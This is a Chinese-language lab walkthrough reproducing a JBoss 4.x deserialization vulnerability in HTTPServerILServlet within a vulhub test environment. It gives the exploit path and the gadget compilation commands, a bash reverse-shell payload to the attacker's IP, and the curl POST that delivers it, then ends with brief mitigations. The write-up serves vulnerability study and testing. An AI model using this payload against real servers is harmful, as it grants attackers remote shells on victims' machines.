一、漏洞介紹
1.1 漏洞簡介
JBoss是一個基於J2EE的開放源代碼應用服務器,用戶佔有量較大,JBoss實現過程的JMS over HTTP Invocation Layer的HttpServerILServlet.java文件存在反序列化漏洞。
1.2 影響版本
- JBoss<4.x
1.3 利用路徑
/jbossmq-httpil/HTTPServerILServlet
1.4 全球統計
二、環境搭建
- 受害者IP:192.168.159.129(vulhub)
- 攻擊者IP:192.168.159.128(kali)
》》啓動Jbos AS 4.0.5
》》訪問web站點
三、操作過程
》》使用JavaDeserH2HC工具
》》使用Gadget:ExampleCommonsCollections1WithHashMap編譯生成序列化數據
javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java
》》序列化惡意數據到文件(bash反彈shell)
java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "bash -i >& /dev/tcp/192.168.159.128/19111 0>&1"
》》nc開啓shell監聽
》》以二進制的方式POST發送數據到目標站點
curl http://192.168.159.129:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser
》》成功收到shell
四、防禦措施
- 將JBoss版本升級到最新
- 儘量不要將JBoss映射到公網